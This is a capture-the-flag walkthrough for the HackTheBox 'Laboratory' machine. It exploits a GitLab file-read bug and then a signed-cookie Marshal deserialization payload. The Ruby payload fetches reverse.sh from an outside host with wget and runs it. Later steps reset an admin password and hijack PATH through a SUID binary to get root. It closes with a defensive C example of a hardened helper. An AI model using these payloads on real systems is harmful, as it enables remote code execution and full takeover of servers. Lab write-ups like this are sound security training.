Notes

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-15 01:48 MST
Nmap scan report for 10.10.10.216
Host is up (0.056s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
| 256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_ 256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.92 seconds

Using this vuln: https://hackerone.com/reports/827052

Found: https://vimeo.com/422686763

I am using the LFI to read the secret key (basically a seed) and then load a local GitLab instance with that key. Doing so is like having an exact copy of the program, which means both instances generate the same signed cookies. Using those cookies, I can run shell commands as the git user.

1. Create account on Gitlab

2. Create 2 projects

3. Create an issue using the LFI vuln to get /var/opt/gitlab/gitlab-rails/etc/secrets.yml

4. Create your own Gitlab 12.8.1 instance

5. On your own system update /etc/gitlab/gitlab-secrets.json with the secret

6. Execute the commands to get the git user on HTB to execute commands. In this case, download a reverse shell and then execute it. Run the following Ruby in the rails console of your own instance:

# Build a request object so the app's own cookie jar can be used
request = ActionDispatch::Request.new(Rails.application.env_config)
# Marshal serializer is required for the object to be deserialized on the target
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar

# Generic form: erb = ERB.new("<%= ` [command here] ` %>")
# Actual command: fetch the reverse shell and run it (same filename in both places)
erb = ERB.new("<%= ` wget --timeout 5 --tries 2 http://10.10.15.55:8000/reverse.sh; bash reverse.sh` %>")

# Proxy that calls erb.result when it is deserialized
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)

# Sign the cookie with the shared secret so the target accepts it, then print it
cookies.signed[:cookie] = depr
puts cookies[:cookie]

7. Send a curl request with the cookie to get the git user to execute the command:

curl -k 'https://git.laboratory.htb' -b "remember_user_token={output from cookie}"

8. Start the rails console on the target and update the password of user 1. Use those creds to sign into GitLab:

# Look up the first user, set a new password and persist it
u = User.where(id:1).first
u.password='password'
u.save

9. Find dexter's private key in securedocker

10. Sign in as dexter, get the user.txt flag

11. Use a tool like lsh.sh or use "find" to find programs with the SUID bit set. There is one program that "docker (UID 998)" is using.

12. Read the method names by using strings

13. Make a malicious chmod program with a reverse shell

14. Add the directory with the malicious program to PATH: PATH={dir here}:$PATH

15. Run the docker-security program. Get a root shell

16. Own Root

SUID binary from step 11: /usr/local/bin/docker-security
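Defensive counterpart to steps 11 to 15, as an added example that is not the box's binary or the author's code: a C sketch of how a privileged helper like docker-security should invoke chmod so that a caller-controlled PATH cannot decide which program runs as root. The function names (is_trusted_binary, run_insecure, run_hardened) and the trusted-prefix list are assumptions for illustration.

```c
/* Added example (not the box's docker-security binary). Shows the PATH-hijack
   shape beside a hardened helper that ignores the caller's environment. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* PATH the helper uses regardless of what the caller supplied (assumed value). */
#define SAFE_PATH "/usr/sbin:/usr/bin:/sbin:/bin"

/* Accept only an absolute path directly under a trusted system directory,
   with no ".." component. Returns 1 if acceptable, 0 otherwise. */
int is_trusted_binary(const char *path) {
    static const char *prefixes[] = {"/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/"};
    if (path == NULL || path[0] != '/' || strstr(path, "/../") != NULL) return 0;
    for (size_t i = 0; i < sizeof prefixes / sizeof prefixes[0]; i++) {
        size_t n = strlen(prefixes[i]);
        if (strncmp(path, prefixes[i], n) == 0 && path[n] != '\0' &&
            strchr(path + n, '/') == NULL)
            return 1;
    }
    return 0;
}

/* Vulnerable shape (for comparison only): the shell resolves "chmod" through
   the caller's PATH, so a writable directory placed first in PATH wins. */
int run_insecure(const char *target) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "chmod 700 %s", target);
    return system(cmd);
}

/* Hardened shape: fixed PATH, absolute binary, no shell, argv passed verbatim.
   Returns chmod's exit status, or -1 on failure to spawn. */
int run_hardened(const char *target) {
    const char *bin = "/bin/chmod";
    if (!is_trusted_binary(bin)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"chmod", "700", (char *)target, NULL};
        char *const envp[] = {"PATH=" SAFE_PATH, NULL}; /* caller's env discarded */
        execve(bin, argv, envp);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same check applies to any setuid program that shells out: a `strings` pass that shows a bare command name like `chmod` is the signal that the helper depends on PATH.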